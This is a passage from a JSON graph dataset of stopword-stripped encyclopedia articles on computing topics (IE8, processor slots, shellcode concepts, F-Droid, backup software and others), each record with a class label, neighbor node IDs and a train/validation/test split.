path analysis tends waste time money resources websites store data visitors site click path information typically used improve website deliver personalized relevant content addition data results used designer review improve redesign website also used model user browsing behaviour online world e-commerce information collected click path allows advertisers construct personal profiles use individually target consumers much effectively ever result advertisers create relevant advertising efficiently spend advertising dollars meanwhile wrong hands click path data poses serious threat personal privacy unauthorized clickstream data collection considered spyware however authorized clickstream data collection comes organizations use opt-in panels generate market research using panelists agree share clickstream data companies downloading installing specialized clickstream collection agents number paths user potentially take greatly increases depending number pages particular website many tools determine path analysis linear account complexity internet usage cases less 5 users follow common path however even users used path still way tell page influential determining behavior even linear forms path analysis see customers drop website “ ” factor still missed main challenge path analysis lies fact tries regulate force users follow certain path reality users diverse specific preference opinions",
    "neighbors": [
      2016,
      225,
      2945,
      7767,
      4956,
      6576,
      8978,
      4725,
      6102,
      119,
      10392,
      4732
    ],
    "mask": "Test"
  },
  {
    "node_id": 7711,
    "label": 1,
    "text": "African_Origins:african origins african origins project database run researchers emory university aims document known facts african diaspora including documentary material pertaining transatlantic slave trade sister project",
    "neighbors": [
      7716
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7712,
    "label": 3,
    "text": "Slot_A:slot slot physical electrical specification 242-lead single-edge-connector used early versions amd athlon processor slot connector allows higher bus rate socket 7 super socket 7 slot motherboards use ev6 bus protocol technology originally developed digital equipment corporation dec alpha 21264 microprocessor slot mechanically compatible electrically incompatible intel slot 1 consequence slot motherboards designed connector installed orientation rotated 180 degrees relative slot 1 motherboards discourage accidental insertion slot 1 processor slot motherboard vice versa choice use mechanical connector intel slot 1 also allowed motherboard manufacturers keep costs stocking part slot 1 slot assemblies slot superseded socket",
    "neighbors": [
      3586,
      9475,
      3588,
      8452,
      3464,
      4872,
      7058,
      10260,
      4252,
      4767,
      2463,
      7714,
      9122,
      1322,
      11183,
      1329,
      3892,
      8629,
      9400,
      7744,
      6978,
      11331,
      9157,
      3783,
      7247,
      9551,
      7122,
      9427,
      3798,
      7132,
      2525,
      4451,
      5859,
      1260,
      1005,
      7788,
      7151,
      1651
    ],
    "mask": "Test"
  },
  {
    "node_id": 7713,
    "label": 2,
    "text": "Internet_Explorer_8:internet explorer 8 windows internet explorer 8 ie8 eighth version internet explorer web browser microsoft released march 19 2009 successor internet explorer 7 released 2006 default browser windows 7 windows server 2008 r2 operating systems internet explorer 8 first version ie pass acid2 test last major browsers later acid3 test scores 24/100. according microsoft security ease use improvements rss css ajax support priorities ie8 internet explorer 8 last version internet explorer run windows server 2003 windows xp following version internet explorer 9 works windows vista later support internet explorer 8 bound lifecycle windows version installed considered os component thus unsupported windows xp due end extended support latter april 2014 effective january 12 2016 internet explorer 8 longer supported client server version windows due new policies specifying newest version ie available supported version windows supported however several windows embedded versions remain supported respective eol unless otherwise specified ie8 development started march 2006 february 2008 microsoft sent private invitations ie8 beta 1 march 5 2008 released beta 1 general public although focus web developers release launched windows internet explorer 8 readiness toolkit website promoting ie8 white papers related software tools new features addition download links beta microsoft developer network msdn added new sections detailing new ie8 technology major press focused controversy version targeting two new features called webslice activities readiness toolkit promoted something developers exploit make internet explorer 8 'light august 27 2008 microsoft made ie8 beta 2 generally available pc world noted various beta 2 features inprivate mode tab isolation color-coding improved standards compatibility compared internet explorer 7 two name changes included activities accelerators ie7 phishing filter renamed safety filter first beta smartscreen accompanied incremental technical changes well august 2008 new feature called inprivate taken spotlight first non-beta version released march 19 2009 january 5 2009 tool provided microsoft block automatic install internet explorer 8 via windows update may 20 2009 windows xpe embedded supported platform internet explorer 8 announcements planned support may 27 2010 microsoft released internet explorer 8 optimized bing msn file name boie8_enus_xp.exe support versions ie windows xp ended effective april 8 2014 due end-of-life january 12 2016 support ie8 supported windows operating systems ceased due new support policies dictating newest version ie available supported version windows supported internet explorer 11 supported except windows vista windows server 2008 internet explorer 9 supported windows server 2012 internet explorer 10 supported language support localization complete release ie8 released 25 languages grew 63 vista 32-bit june 2009 support additional languages come pre-installed based os downloaded installed via multilingual user interface mui packages ie8 contains many new features including webslices accelerators accelerators form selection-based search allow user invoke online service page using mouse actions selecting text objects give users access usable accelerator services blogging selected text viewing map selected geographical location invoked selected object according microsoft accelerators eliminate need copy paste content web pages ie8 specifies xml-based encoding allows web application web service invoked accelerator service service invoked categories content show specified xml file similarities drawn accelerators controversial smart tags feature experimented ie 6 beta withdrawn criticism though later included ms office address bar features domain highlighting added security top-level domain shown black whereas parts url grayed domain highlighting turned users web sites features address bar include support pasting multi-line urls improved model inserting selection caret selecting words entire urls address bar inline autocomplete feature dropped internet explorer 8 leading criticism beta users website add-on causes tab crash internet explorer 8 tab affected browser remains stable tabs remain unaffected thereby minimizing disruption browsing experience tab unexpectedly closes crashes automatically reloaded content crash developers internet explorer 8 includes tools allow debugging html css javascript vbscript within browser another new feature ie8 redesigned favorites bar host content web slices web feeds documents addition website links internet explorer 8 replaced find ... dialog box inline find toolbar activated pressing ctrl+f search box drop-down menu f3 kind keyboard-driven nextfind command gone internet explorer 8 highlights instances found words allowing user continue navigation normally new security mode called inprivate debuted ie8 consists two main features inprivate browsing inprivate filtering inprivate browsing described porn mode various news outlets similar feature first introduced safari 2005 later implemented firefox 3.5 opera 10.5 google chrome informationweek mentioned stealth privacy mode inprivate browsing internet explorer 8 helps prevent one browsing history temporary internet files form data cookies usernames passwords retained browser leaving easily accessible evidence browsing search history inprivate filtering provides users added level control choice information third party websites use track browsing activity inprivate subscriptions allow augment capability inprivate blocking subscribing lists websites block allow private browsing modes ways information browsing session recovered internet explorer 8 includes performance improvements across html parser css engine mark-up tree manipulation well jscript runtime associated garbage collector memory leaks due inconsistent handling circular references jscript objects dom objects corrected better security stability ie8 uses loosely coupled internet explorer lcie architecture runs browser frame tabs separate processes lcie prevents glitches hangs bringing entire browser leads higher performance scalability permissions activex controls made flexible instead enabling disabling globally allowed per-site basis smartscreen filter extended internet explorer 7 phishing filter include protection socially engineered malware every website download checked local list popular legitimate websites site listed entire address sent microsoft checks labeled impostor harmful internet explorer 8 show screen prompting site reported harmful n't visited user either visit homepage visit previous site continue unsafe page user attempts download file location reported harmful download cancelled effectiveness smartscreen filtering reported superior socially engineered malware protection browsers feature disabled enforced using group policy feature described microsoft tool suggest websites done browser sending information microsoft secure connection keeps information per-session uniquely generated identifier short time suggested sites feature turned default disabled user browsing inprivate enabled visiting ssl-secured intranet ip address idn address sites information could personally identifiable user ip address browser information sent microsoft artifact https protocol microsoft stated store information functionality defended microsoft itworld.com gregg keizer described phone home feature web slices snippets entire page user subscribe web slices kept updated browser automatically viewed directly favorites bar complete graphics visuals developers mark parts pages web slices using codice_1 codice_2 microformat web slices compared active desktop introduced internet explorer 4 1997 microsoft donated specification public domain creative commons public domain dedication also covered microsoft open specification promise windows rss platform also supports authenticated feeds beginning internet explorer 8 full-page zoom reflows text remove appearance horizontal scrollbars zooming image scaling done using bicubic interpolation resulting smoother looking images scaled using compatibility mode cause style issues select form elements changing zoom levels information bar lets users allow activex control run web sites current one users easily make changes behavior manage add-ons dialog box activex control list sites approved user internet explorer 8 main rendering mode known standards mode improved support various web standards especially css compared internet explorer 7 earlier versions web standards supported ie8 include following however ie8 support w3c standards ie8 passes acid2 test fails acid3 test score 20/100 development microsoft developed 7,000 tests css level 2 compliance submitted w3c inclusion test suite internet explorer 8 promoted microsoft stricter adherence w3c described web standards internet explorer 7 result every ie version percentage web pages coded behavior older versions would break ie8 would repetition situation ie7 fixed bugs ie6 broke pages used ie6-specific hacks work around non-compliance especially problem offline html documents may updatable e.g stored read-only medium cd-rom dvd-rom avoid situation ie8 implements form version targeting whereby page could authored specific version browser using codice_8 declaration either meta element http headers order maintain backwards compatibility sites opt-into ie7-like handling content inserting specially created meta element web page triggers compatibility mode browser using five weeks release ie 8 beta 2 august 2008 beta 1 market share grown 0.05 percent 0.61 percent according net applications july 2009 four months final release market share jumped 13 percent estimates ie8 global market share ranged 6.93 8.73 according net applications web analytics october 2014 internet explorer 8 accounts 17.31 web traffic overtaken ie11 usage march 19 2009 review benny har-even pro offered praise internet explorer 8 noting reliability good features concluding certainly best version internet explorer long time also yet anything make firefox users want jump ship offered praise microsoft paying attention competition producing better featured faster reliable browsing experience masses suggested microsoft continues improve product would become harder persuade unconverted switch away ie next month april 2 mark joseph edwards wrote newsletter windows secrets new edition internet explorer greatly improved security speed compatibility opined still lagged behind competitors three areas edwards noted time internet explorer 8 still underperforming relative browsers speed successful displaying webpages intended display browsers firefox opera terms security wrote continued reliance activex makes browser vulnerable foundation reasons suggested firefox remained better alternative internet explorer 8 even though much better browser ie 7 ie8 requires least",
    "neighbors": [
      6657,
      9736,
      2579,
      6171,
      9757,
      10791,
      9770,
      10282,
      559,
      4661,
      3639,
      10808,
      9275,
      64,
      3137,
      1098,
      5707,
      10828,
      9808,
      10834,
      6231,
      8281,
      603,
      2139,
      6747,
      8797,
      8798,
      1642,
      9834,
      9328,
      4722,
      115,
      9843,
      119,
      4728,
      637,
      1664,
      5765,
      134,
      651,
      6797,
      5784,
      10910,
      8351,
      161,
      7340,
      3760,
      9908,
      185,
      11449,
      4797,
      7364,
      11466,
      7885,
      9424,
      4310,
      2777,
      8923,
      737,
      4326,
      4331,
      4844,
      8443,
      2304,
      5380,
      7943,
      1802,
      1807,
      790,
      3350,
      7965,
      10020,
      11559,
      1834,
      10026,
      7983,
      11060,
      10057,
      11112,
      8557,
      6528,
      8576,
      3971,
      3462,
      8584,
      9609,
      6028,
      8080,
      5523,
      7572,
      5026,
      11683,
      5054,
      5057,
      9167,
      4048,
      5078,
      11223,
      5082,
      479,
      10722,
      5605,
      487,
      8169,
      4074,
      2027,
      4075,
      494,
      1520,
      7152,
      6133,
      5114
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7714,
    "label": 3,
    "text": "Slot_2:slot 2 slot 2 refers physical electrical specification 330-lead single edge contact cartridge edge-connector used intel pentium ii xeon certain models pentium iii xeon first introduced slot 1 pentium iis intended replace pentium pentium pro processors home desktop low-end symmetric multiprocessing smp markets pentium ii xeon aimed multiprocessor workstations servers largely similar later pentium iiis based p6 deschutes core aside wider choice l2 cache ranging 512 2048 kb full-speed off-die l2 cache pentium 2 used cheaper third-party sram chips running 50 cpu speed reduce cost design 242-lead slot 1 connector support full-speed l2 cache xeon extended 330-lead connector developed new connector dubbed 'slot 2 used pentium ii xeon first two pentium iii xeon cores codenamed 'tanner 'cascades slot 2 finally replaced socket 370 pentium iii tualatin tualatin pentium iiis packaged 'pentium iii 'xeon though identical",
    "neighbors": [
      3588,
      5901,
      5523,
      2455,
      3992,
      8855,
      11417,
      3995,
      4252,
      6175,
      7712,
      10019,
      4523,
      2604,
      2350,
      6192,
      9649,
      4537,
      7105,
      4805,
      7110,
      8394,
      3403,
      4427,
      4179,
      3798,
      4185,
      7002,
      9945,
      11484,
      9570,
      10468,
      613,
      8552,
      1260,
      4717,
      10225,
      371,
      3317,
      9592,
      8442
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7715,
    "label": 4,
    "text": "Core_International:core international core international inc. commonly known core multinational computer technology corporation headquartered boca raton florida united states company part sony longer exists stand-alone identity company founded 1979 hal prewitt technology firm develop market support computer related products services best known supporting ibm first business microcomputers 5100 5110 5120 introduction ibm pc pc company provided extensive line disk drives backup personal computer products core became well known leading industry developer disk array computer data storage many core products first kind direct competition widely regarded superior performance reliability users computer press raved core products infoworld described core atplus built like sherman tank offering exceptional performance reliability pc magazine called workhorses performance computing high-quality construction..breaks speed barrier access times asked manufactures follow suit core known advertising perhaps produced pc industry greatest promotions 1985 1986 rebate recall ad ibm pc hard disk drives successful controversial rumor topic ibm board directors meeting time gave away free ibm pc purchasing one core atplus 72 mb drives core remained private company solely owned prewitt 1993 purchased aiwa wholly owned subsidiary sony business history pre-incorporation company built early work prewitt using business personal computer development experiences period creation first microcomputers launch altair 8800 founding microsoft selling programming minicomputers assembling microcomputers attaching computer peripherals programming building business computer systems core created different business model initially marketed association structured for-profit organization specifically users ibm 5100 series ibm system/23 objective sell mail-order computer supplies pre-developed off-the-shelf programs hardware maintenance service supplies included printer ribbons paper diskettes tape cartridges software ranged simple mortgage interest calculations word processing games utilities advanced payroll accounting industry specific applications users wanted readily available simple install support software also low cost core able fill niche ibm developed machines engineering scientific applications mind business programs construction agriculture manufacturing generally available computer maintenance insurance program provided on-site repairs replacement parts provided ibm service lower cost available directly ibm company successful attracting users ibm 5100 series many ibm sales representatives referred customers organization core grew profits used continuing development computer data storage ibm machines closed architecture design information unpublished held secret computer systems design extremely likely impossible ability swap components obtain support vendors upgrade better configuration/another model unless option available original manufacturer limitations make customer dependent one vendor products services software hardware parts system core sensed opportunity provide greater faster computer data storage five-year effort september 1982 announced availability first hard disk drives local area network lan ibm 5100 series ibm systems sold storage limited without network option 5100 tape 5110 5120 restricted 1.2 mb floppy disks core drives available starting 10 mb increased 160 mb removable fixed configurations corenet lan built core storage system allowed interconnection eight ibm 5100 series systems providing ability share storage data configuration pre-dated lans period ibm pc compatibles 1983 core introduced two major solutions ibm withdrawing marketing ibm 5100 series first software called pc51 would run allowed 5100 series computer programs written basic run unmodified ibm pc compatibles ms-dos second lan card ibm pc compatibles provided connection ibm 5100 series network solutions allowed ibm 5110/5120 series users add new technology increase productivity retaining investment equipment software core development storage systems lan pc51 software major technology engineering feat without rivals due complexity successful reverse engineering systems resulted captive market organization able provide upgrade path ibm owners 1984 core expanded product focus entered personal computer pc marketplace company first product introduced year called pc-51 completely new operating system language ibm pc compatibles enabled pc function like ibm 5110/5120 system demonstrating company strong software development capabilities allow users continue using application software already developed increased processing speed factor two ten times reduced maintenance cost 90 new product opened unexplored marketplace core allowing company become ibm value-added dealer vad sell ibm pc core products individually combined package ibm authorized promoted relationship provided upgrade path customers previously unavailable result early development effort ibm 5100 series core released family high-performance hard disk drives called atplus series better capacity reliability performance ibm drives weeks introduction new ibm august 1984 core discovered problems factory-issued hard disk drive media marketplace learned ibm disk problems core unique position capitalize opportunity without significant competition six months ibm model cmi short supply delays attributed lack drives technical problems machine undisclosed issues core desired major partner selected control data corporation cdc assist introduction drives pc marketplace announcement made february 1985 generated significant amount press coverage core discovered general lack understanding existed among news media users regarding technology different computer mass storage systems understood value different systems end-user rate many choices marketplace response core began placing considerable emphasis user education resulted major contribution computer industry directly efforts news media computer magazines product reviewers dealers computer manufactures started discussing providing promoting seek time access time transfer time value understand hard disk drives importance computer system company believed end-users learned computers engineering behind core products less users wanted product purchasers ibm reporting dealers installing inferior drives computer without disclosing fact help buyers industry education core developed diskp program later replaced coretest dos based identify sub-standard products providing visual demonstration speed comparative measurements hard disk drives controllers many computer publications hardware manufacturers distributors dealers independent evaluation firms relied coretest product comparison made coretest industry standard often quoted benchmark programs provide without charge freely available bbs computer magazines dealers believed installed base million copies worldwide promoting core technology education two years newspapers magazines computer publications ran stories ibm computer memories inc. cmi hard disk drives problems",
    "neighbors": [
      9025,
      3366,
      1801,
      9166,
      6129,
      6003,
      3323,
      10173
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7716,
    "label": 1,
    "text": "Voyages:_The_Trans-Atlantic_Slave_Trade_Database:voyages trans-atlantic slave trade database voyages trans-atlantic slave trade database database run researchers emory university aims present documentary material pertaining transatlantic slave trade sister project african origins",
    "neighbors": [
      7711
    ],
    "mask": "None"
  },
  {
    "node_id": 7717,
    "label": 4,
    "text": "Shellcode:shellcode hacking shellcode small piece code used payload exploitation software vulnerability called shellcode typically starts command shell attacker control compromised machine piece code performs similar task called shellcode function payload limited merely spawning shell suggested name shellcode insufficient however attempts replacing term gained wide acceptance shellcode commonly written machine code shellcode either local remote depending whether gives attacker control machine runs local another machine network remote local shellcode used attacker limited access machine exploit vulnerability example buffer overflow higher-privileged process machine successfully executed shellcode provide attacker access machine higher privileges targeted process remote shellcode used attacker wants target vulnerable process running another machine local network intranet remote network successfully executed shellcode provide attacker access target machine across network remote shellcodes normally use standard tcp/ip socket connections allow attacker access shell target machine shellcode categorized based connection set shellcode establishes connection called reverse shell connect-back shellcode shellcode connects back attacker machine hand attacker establishes connection shellcode called bindshell shellcode binds certain port victim machine third much less common type socket-reuse shellcode type shellcode sometimes used exploit establishes connection vulnerable process closed shellcode run shellcode re-use connection communicate attacker socket re-using shellcode elaborate since shellcode needs find connection re-use machine may many connections open firewall used detect outgoing connections made connect-back shellcode well incoming connections made bindshells therefore offer protection attacker even system vulnerable preventing attacker connecting shell created shellcode one reason socket re-using shellcode sometimes used create new connections therefore harder detect block download execute type remote shellcode downloads executes form malware target system type shellcode spawn shell rather instructs machine download certain executable file network save disk execute nowadays commonly used drive-by download attacks victim visits malicious webpage turn attempts run download execute shellcode order install software victim machine variation type shellcode downloads loads library advantages technique code smaller require shellcode spawn new process target system shellcode need code clean targeted process done library loaded process amount data attacker inject target process limited execute useful shellcode directly may possible execute stages first small piece shellcode stage 1 executed code downloads larger piece shellcode stage 2 process memory executes another form staged shellcode used attacker inject larger shellcode process determine process end small egg-hunt shellcode injected process predictable location executed code searches process address space larger shellcode egg executes type shellcode similar egg-hunt shellcode looks multiple small blocks data eggs recombines one larger block omelette subsequently executed used attacker inject number small blocks data process exploit commonly inject shellcode target process time exploits vulnerability gain control program counter program counter adjusted point shellcode gets executed performs task injecting shellcode often done storing shellcode data sent network vulnerable process supplying file read vulnerable process command line environment case local exploits processes filter restrict data injected shellcode often needs written allow restrictions includes making code small null-free alphanumeric various solutions found get around restrictions including since intrusion detection detect signatures simple shellcodes sent network often encoded made self-decrypting polymorphic avoid detection exploits target browsers commonly encode shellcode javascript string using percent-encoding escape sequence encoding \\uxxxx entity encoding exploits also obfuscate encoded shellcode string prevent detection ids example ia-32 architecture two codice_1 no-operation instructions would look first unencoded encoded string using percent-encoding using codice_2 function decode next encoded string using \\uxxxx -encoding finally encoded string using entity encoding shellcodes written without use null bytes intended injected target process null-terminated strings null-terminated string copied copied including first null subsequent bytes shellcode processed shellcode contains nulls injected way part shellcode would injected making incapable running successfully produce null-free shellcode shellcode contains null bytes one substitute machine instructions contain zeroes instructions effect free nulls example ia-32 architecture one could replace instruction contains zeroes part literal 1 expands 0x00000001 instructions effect take fewer bytes encode free nulls certain circumstances target process filter byte injected shellcode printable alphanumeric character circumstances range instructions used write shellcode becomes limited solution problem published rix phrack 57 showed possible turn code alphanumeric code technique often used create self-modifying code allows code modify bytes include bytes outside normally allowed range thereby expanding range instructions use using trick self-modifying decoder created initially uses bytes allowed range main code shellcode encoded also using bytes allowed range output shellcode run decoder modify code able use instruction requires function properly continues decode original shellcode decoding shellcode decoder transfers control executed normal shown possible create arbitrarily complex shellcode looks like normal text english modern programs use unicode strings allow internationalization text often programs convert incoming ascii strings unicode processing unicode strings encoded utf-16 use two bytes encode character four bytes special characters ascii string transformed utf-16 zero byte inserted byte original string obscou proved phrack 61 possible write shellcode run successfully transformation programs automatically encode shellcode alphanumeric utf-16-proof shellcode exist based principle small self-modifying decoder decodes original shellcode shellcode written machine code low level vulnerability exploited gives attacker access process shellcode therefore often created target one specific combination processor operating system service pack called platform exploits due constraints put shellcode target process specific shellcode must created however impossible one shellcode work multiple exploits service packs operating systems even processors versatility commonly achieved creating multiple versions shellcode target various platforms creating header branches correct version platform code running executed code behaves differently different platforms executes right part shellcode platform running shellcode executed directly order analyze shellcode attempts must loaded another process one common analysis technique write small c program holds shellcode byte buffer use function pointer use inline assembler transfer execution another technique use online tool shellcode_2_exe embed shellcode pre-made executable husk analyzed standard debugger specialized shellcode analysis tools also exist idefense sclog project originally released 2005 part malcode analyst pack sclog designed load external shellcode files execute within api logging framework emulation based shellcode analysis tools also exist sctest application part cross platform libemu package another emulation based shellcode analysis tool built around libemu library scdbg includes basic debug shell integrated reporting features",
    "neighbors": [
      642,
      8066,
      5380,
      5636,
      9739,
      3473,
      11537,
      1429,
      5531,
      7325,
      10786,
      8998,
      7851,
      7855,
      7856,
      7983,
      9393,
      10420,
      5176,
      7228,
      2878,
      1474,
      4562,
      1113,
      2138,
      4956,
      6754,
      3555,
      742,
      8167,
      1776,
      499,
      2804,
      3708,
      7421,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7718,
    "label": 4,
    "text": "Cobian_Backup:cobian backup cobian backup free donation-supported backup software microsoft windows written delphi luis cobian umeå university cobian backup originally released 2000 program later rewritten released version 7 next version version 8 released 2006 source code later released mozilla public license late january 2007 however version 9 author cobian backup decided switch back completely closed source model older versions remain open source forever release program mozilla public license revoked development support original author discontinued version 11.2.0.582 source code since sold cobian backup supports unicode ftp compression zip sqx 7z encryption including blowfish rijndael des rsa-rijndael incremental differential backup example differential backup every night backs user files changed since last full backup full backup every seventh night backing full set user files backups saved cd dvd usb memory stick second hard drive internal external etc supports long file names 32,000 characters backup routines",
    "neighbors": [
      9025,
      7364,
      6280,
      1801,
      4845,
      3629,
      1358,
      6797,
      7983
    ],
    "mask": "Train"
  },
  {
    "node_id": 7719,
    "label": 3,
    "text": "Dynamite_Dan:dynamite dan dynamite dan platform game written rod bowkett zx spectrum published mirrorsoft 1985 ported amstrad cpc commodore 64 msx sequel dynamite dan 2 released following year gameplay similar jet set willy highly rated game time game starts dan lands airship top evil dr blitzen hideout aim game find eight sticks dynamite placed randomly around playing area whilst avoiding perils game moving monsters drowning falling great heights dan eight sticks dynamite player must make way central safe blow open steal plans evil doctor death ray escape airship playing area essentially one large building split multiple screens wrap around central elevator screen contains number moving monsters player moves destroyed take life return exception destroyed walked dr blitzen assistant donner donner blitzen located screen safe perils dan life include running energy caused collecting enough food falling heights hit laser beams dan also fall underground river flows beneath building player receive game unless dan picked oxygen case sent back start game completed game provides secret code deciphered telephone number call answer number longer works prize ride mirrorsoft blimp background music choosing game settings waiting game start third movement rondo alla turca wolfgang amadeus mozart piano sonata 11 major k. 331 readers crash magazine voted best platform game year zx spectrum version voted 24th best game time special issue sinclair magazine 2004",
    "neighbors": [
      9006,
      1527
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7720,
    "label": 6,
    "text": "Apple_ISO_9660_Extensions:apple iso 9660 extensions apple set iso 9660 extensions extends filesystem hfs properties primary file system apple macintosh computers hfs hfs+ hfs file system properties fat file systems primarily used windows 95 98 operating systems metadata properties include order allow non-macintosh systems access macintosh files cd-roms apple chose use extension standard iso 9660 format data apple specific metadata remains visible operating systems able read iso 9660",
    "neighbors": [
      5413,
      5062,
      1801,
      8075,
      6062,
      5231,
      7342,
      7983,
      8110,
      8114,
      5816,
      5596
    ],
    "mask": "Test"
  },
  {
    "node_id": 7721,
    "label": 7,
    "text": "CallidusCloud:calliduscloud calliduscloud global enterprise software saas company headquartered dublin california company best known cloud-based solutions sales effectiveness sales performance management sales execution cpq clm software services callidus software inc. incorporated delaware september 6 1996 founders andrew swett scott kitayama company specializing providing enterprise incentive management eim application systems initial funding came onset ventures first hire former chief architect greg holmberg followed former president ceo reed d. taussig november 2003 company went public nasdaq national market stock symbol cald raising us 70 million following list acquisitions calliduscloud.com calliduscloud formerly callidus software 200m revenue 200m cash grows around 30 2014 total revenue 136.6 million increase 24.3 million 22 2013 2015 total revenue increased 27 173.1 million 2015 company added 900 customers take total number companies using one software products 4,600 report 5000 january 30 2018 announced sap company acquired calliduscloud 2.4 billion calliduscloud provides software service saas solutions marketing sales effectiveness suite solutions includes applications identify right leads ensure proper territory quota distribution enable sales forces automate quote proposal generation streamline sales compensation additionally offer applications customer experience monitoring sales gamification learning management including content authoring calliduscloud global alliance partners providing integrated solution complement calliduscloud products system integrators partners providing user companies wide range selections support different sales methodologies drive revenue technology partners provide functionality complements calliduscloud product capabilities partner companies include adobe accenture canidium llc deloitte lanshore llc netsuite opensymmetry oracle salesforce.com sap",
    "neighbors": [
      4194,
      1539,
      10090,
      467,
      5210
    ],
    "mask": "Test"
  },
  {
    "node_id": 7722,
    "label": 2,
    "text": "F-Droid:f-droid f-droid community-maintained software repository android similar google play store main repository hosted project contains free libre software apps applications browsed installed f-droid website client app without need register account anti-features advertising user tracking dependence nonfree software flagged app descriptions website also offers source code applications hosts well software running f-droid server allowing anyone set app repository f-droid founded ciaran gultnieks 2010 client forked aptoide source code project run english nonprofit f-droid limited replicant fully free software android operating system uses f-droid default recommended app store guardian project suite free secure android applications started running f-droid repository early 2012 2012 free software foundation europe featured f-droid free android campaign raise awareness privacy security risks proprietary software f-droid chosen part gnu project gnu day initiative 30th anniversary encourage use free software march 2016 f-droid partnered guardian project copperheados goal creating solution verifiably trusted operating system network network services way app stores apps f-droid repository contains growing number 2,600 apps compared 1.43 million google play store project incorporates several software sub-projects f-droid builds apps publicly available freely licensed source code project run entirely volunteers formal app review process new apps contributed user submissions developers requirement free proprietary software install f-droid client user allow installation unknown sources android settings retrieve apk installable file official site installation available google play store due non-compete clause google play developer distribution agreement client designed resilient surveillance censorship unreliable internet connections promote anonymity supports http proxies repositories hosted tor hidden services client devices function impromptu app stores distributing downloaded apps devices local wi-fi bluetooth android beam f-droid client app automatically offer updates installed f-droid apps f-droid privileged extension installed updates also conducted app background extension installed via rooting flashing zip file device android operating system checks updates signed key preventing others distributing updates signed different key originally google play store required applications signed developer application f-droid allowed signing keys apps previously installed another source reinstalled receive updates 2017 google play encourages developers let google play manage signing keys offering similar service f-droid offered since 2011 f-droid lets developers use keys via reproducible build process 2012 security researcher developer moxie marlinspike discouraged use f-droid particular criticised distributing outdated version textsecure contained known bug fixed recent version application f-droid announced removal textsecure repository noting removal requested marlinspike also pointing source code official textsecure binary bug question fixed published marlinspike later criticised project handling issue stating mischaracterized scope bug incredibly immature post announcing removal received email users view misled f-droid announcement",
    "neighbors": [
      10368,
      5637,
      9487,
      788,
      1813,
      8213,
      9365,
      10900,
      8476,
      10270,
      11680,
      673,
      9508,
      4775,
      6828,
      5677,
      9262,
      7983,
      823,
      1083,
      5819,
      190,
      9923,
      9671,
      5067,
      4685,
      3918,
      463,
      3152,
      2001,
      3667,
      11606,
      4951,
      6361,
      2010,
      8413,
      4063,
      2401,
      1379,
      741,
      231,
      6119,
      9063,
      8554,
      5100,
      7293
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7723,
    "label": 5,
    "text": "Space-division_multiple_access:space-division multiple access space-division multiple access sdma channel access method based creating parallel spatial pipes next higher capacity pipes spatial multiplexing and/or diversity able offer superior performance radio multiple access communication systems traditional mobile cellular network systems base station information position mobile units within cell radiates signal directions within cell order provide radio coverage method results wasting power transmissions mobile units reach addition causing interference adjacent cells using frequency called co-channel cells likewise reception antenna receives signals coming directions including noise interference signals using smart antenna technology differing spatial locations mobile units within cell space-division multiple access techniques offer attractive performance enhancements radiation pattern base station transmission reception adapted user obtain highest gain direction user often done using phased array techniques gsm cellular networks base station aware distance direction mobile phone use technique called timing advance ta base transceiver station bts determine far mobile station ms interpreting reported ta information along parameters used power bts ms power control feature implemented network power control either bts ms implemented modern networks especially ms ensures better battery life ms also bts close user results less exposure electromagnetic radiation manner 5th generation mobile networks focused using given position ms relation bts order focus ms radio frequency power bts direction vice versa thus enabling power savings mobile operator reducing ms sar index reducing em field around base stations since beam forming concentrate rf power used rather spread uniformly around bts reducing health safety concerns enhancing spectral efficiency decreased ms battery consumption",
    "neighbors": [
      10112,
      4609,
      2306,
      388,
      8708,
      3847,
      2057,
      1550,
      11288,
      2458,
      5020,
      5664,
      1192,
      11560,
      11181,
      1969,
      2994,
      1083,
      448,
      7490,
      3140,
      7108,
      9284,
      11591,
      5321,
      7498,
      9038,
      3959,
      9296,
      2911,
      3168,
      1121,
      2785,
      4068,
      5092,
      5863,
      7400,
      1650,
      2802,
      119
    ],
    "mask": "Test"
  },
  {
    "node_id": 7724,
    "label": 0,
    "text": "Association_for_Computational_Linguistics:association computational linguistics association computational linguistics acl international scientific professional society people working problems involving natural language computation annual meeting held summer locations significant computational linguistics research carried founded 1962 originally named association machine translation computational linguistics amtcl became acl 1968 acl european eacl north american naacl chapter acl journal computational linguistics primary forum research computational linguistics natural language processing since 1988 journal published acl mit press acl large number special interest groups sigs focusing specific areas natural language processing current sigs within acl year acl elects distinguished computational linguist becomes vice-president organization next calendar year president one year later recent acl presidents",
    "neighbors": [
      1027,
      6662,
      2059,
      2578,
      5781,
      2326,
      4509,
      4131,
      11308,
      9522,
      1460,
      11318,
      3127,
      8375,
      10557,
      4038,
      9032,
      1737,
      9288,
      4942,
      3668,
      11348,
      2518,
      10456,
      1890,
      7780,
      8562,
      3059,
      7676
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7725,
    "label": 4,
    "text": "Tarah_Wheeler:tarah wheeler tarah marie wheeler born february 12 1979 american technology cybersecurity executive author currently cybersecurity policy fellow d.c. policy think-tank new america former cybersecurity czar symantec author women tech founder infosec unlocked wheeler received bachelor degree carroll college master degree political science portland state university 2004 named national science foundation-funded fellow center study complex systems university michigan 2012 founded cloud computing company fizzmint 2014 wheeler founded infosec unlocked diversity non-profit whose goal help bring diverse voices infosec conferences across united states paper writing events scholarships extension youtube series discussed diversity topics def con unlocked series mostly covered topics relating diversity def con one world largest hacker conferences 2016 wheeler named cybersecurity passcode influencer christian science monitor 2016 spoke federal trade commission information security tech startups published women tech book dedicated teaching women succeed tech careers gave advice women technologists interview techniques salary negotiation systems architect mobile encryption firm silent circle fall 2016 university california berkeley taught class wheeler book necessities overcoming barriers entry technology industry requirements success woman trying enter field kickstarter campaign wheeler published women tech several contributors including esther dyson brianna wu one targets gamergate controversy experienced threats including wu retained coauthor due wu experience gaming industry wheeler experienced multiple death rape threats online activism august 2017 wheeler announced twitter left symantec work several books october awarded inaugural women leaders cybersecurity award nyu senior director data trust threat vulnerability management splunk currently cybersecurity policy fellow d.c. policy think-tank new america wheeler cited national media expert issues relating cybersecurity cyberterrorism malware data breaches written cyberwar policy wheeler plays poker competed world series poker",
    "neighbors": [
      5373,
      11429,
      3629,
      9569
    ],
    "mask": "Train"
  },
  {
    "node_id": 7726,
